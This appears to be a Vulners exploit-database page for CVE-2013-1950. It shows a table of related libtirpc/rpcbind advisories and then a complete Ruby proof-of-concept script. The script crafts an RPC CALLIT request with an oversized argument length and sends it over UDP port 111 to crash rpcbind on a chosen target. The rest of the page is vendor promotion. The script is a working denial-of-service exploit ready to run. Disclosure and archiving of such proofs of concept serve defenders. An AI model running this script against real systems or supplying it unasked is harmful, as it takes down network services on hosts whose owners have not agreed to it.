| Reporter | Title | Published | Views | Family All 43 |
|---|---|---|---|---|
| rpcbind (CALLIT Procedure) UDP Crash PoC | 16 Jul 201300:00 | – | zdt | |
| Medium: libtirpc | 11 Jun 201300:00 | – | amazon | |
| Amazon Linux AMI : libtirpc (ALAS-2013-199) | 4 Sep 201300:00 | – | nessus | |
| CentOS 6 : libtirpc (CESA-2013:0884) | 31 May 201300:00 | – | nessus | |
| F5 Networks BIG-IP : libtirpc vulnerability (K19157044) | 19 Feb 201600:00 | – | nessus | |
| Fedora 19 : libtirpc-0.2.3-2.fc19 (2013-6262) | 29 Apr 201300:00 | – | nessus | |
| MiracleLinux 4 : libtirpc-0.2.1-6.AXS4 (AXSA:2013-481:01) | 16 Jan 202600:00 | – | nessus | |
| Oracle Linux 6 : libtirpc (ELSA-2013-0884) | 12 Jul 201300:00 | – | nessus | |
| RHEL 6 : libtirpc (RHSA-2013:0884) | 31 May 201300:00 | – | nessus | |
| RHEL 6 : rhev-hypervisor6 (RHSA-2013:1076) | 8 Nov 201400:00 | – | nessus |
`#!/usr/bin/ruby
#
# rpcbind_udp_crash_poc.rb
# 07/15/2013
# Sean Verity <veritysr1980 [at] gmail.com>
# CVE 2013-1950
#
# rpcbind (CALLIT Procedure) UDP Crash PoC
# Affected Software Package: rpcbind-0.2.0-19
#
# Tested on:
# Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP)
# CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)
#
# rpcbind can be crashed by setting the argument length
# value > 8944 in an RPC CALLIT procedure request over UDP.
#
require 'socket'
def usage
abort "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"
end
if ARGV.length == 1
pkt = [rand(2**32)].pack('N') # XID
pkt << [0].pack('N') # Message Type: CALL (0)
pkt << [2].pack('N') # RPC Version: 2
pkt << [100000].pack('N') # Program: Portmap (100000)
pkt << [2].pack('N') # Program Version: 2
pkt << [5].pack('N') # Procedure: CALLIT (5)
pkt << [0].pack('N') # Credentials Flavor: AUTH_NULL (0)
pkt << [0].pack('N') # Length: 0
pkt << [0].pack('N') # Credentials Verifier: AUTH_NULL (0)
pkt << [0].pack('N') # Length: 0
pkt << [0].pack('N') # Program: Unknown (0)
pkt << [1].pack('N') # Version: 1
pkt << [1].pack('N') # Procedure: 1
pkt << [8945].pack('N') # Argument Length
pkt << "crash" # Arguments
s = UDPSocket.new
s.send(pkt, 0, ARGV[0], 111)
else
usage
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation